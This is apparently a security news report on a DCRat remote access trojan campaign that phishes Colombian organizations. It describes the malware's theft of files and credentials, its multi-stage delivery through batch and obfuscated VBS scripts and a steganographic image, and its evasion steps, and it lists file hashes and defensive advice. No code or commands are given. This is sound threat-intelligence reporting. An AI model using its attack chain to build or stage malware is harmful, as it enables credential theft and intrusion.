Windows Devices at Risk – DCRat Malware Gains Remote Access, Steals Files and Browser Credentials

A newly uncovered cyberattack campaign, identified by the FortiMail Incident Response team, is targeting organizations in Colombia with a sophisticated Remote Access Trojan (RAT) known as DCRat.

Masquerading as communications from a Colombian government agency, this campaign leverages advanced obfuscation techniques and a multi-stage payload strategy to infiltrate Windows systems, gain remote access, and exfiltrate sensitive data.

Modular RAT with Advanced Capabilities

DCRat is notable for its modular architecture, which allows threat actors to customize the RAT for various malicious purposes, including surveillance, data theft, and persistence. Once installed, the malware enables attackers to:

• Gain complete remote control of the infected systems, execute arbitrary commands, and manage files.
• Steal credentials, browser data, and sensitive documents, including via screenshot capture and keylogging.
• Manipulate system settings (such as rebooting, logging off users, or creating new accounts) and modify visual elements, including wallpapers.
• Harvest browser cookies, browsing history, and saved credentials, as well as automate web actions from the victim’s browser.

Stealthy Multi-Stage Attack Chain

The attack initiates with a phishing email containing a password-protected ZIP file, designed to circumvent basic security filters.

This archive contains a batch (.bat) file that downloads and executes a heavily obfuscated Visual Basic script from a text-sharing website.

After several layers of obfuscation are removed, the script executes embedded base64-encoded payloads, which ultimately extract a final executable concealed within a steganographically altered image file hosted on an archive website.

The RAT’s configuration, including C2 server IP, port, and cryptographic keys (hardcoded and AES256-encrypted), is decrypted and used to establish communications with the attacker’s infrastructure.

Advanced analysis functions are present, such as checks for virtual machine environments, attempts to disable critical Windows administrative tools, bypassing Microsoft’s Antimalware Scan Interface (AMSI), and creating system persistence through scheduled tasks or registry modifications.

Severe Impact and Defense Measures

Once installed, DCRat can harvest critical information and establish persistent access, posing a severe threat to corporate and governmental systems.

The Fortinet suite of security products, including FortiMail, FortiGate, and FortiEDR, detects and blocks all stages of this malware, leveraging up-to-date threat intelligence and content disarmament technologies.

Key technical indicators (IOCs) have been published:

• ZIP SHA-256: db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb837189c6551010a6f828590
• VBS SHA-256: b0f3c7ea17875b5e1545678b3878ce268ff4bde718b66254ce01b0bb864801b8
• EXE SHA-256: 77a22e30e4cc900379fd4b04c707d2dfd174858c8e1ee3f1cbecd4ece1fab3fe

Organizations, especially in Latin America, are urged to educate users on phishing, maintain security solutions with the latest threat intelligence, and review incident response plans.
If compromise is suspected, immediate consultation with cybersecurity professionals is strongly advised.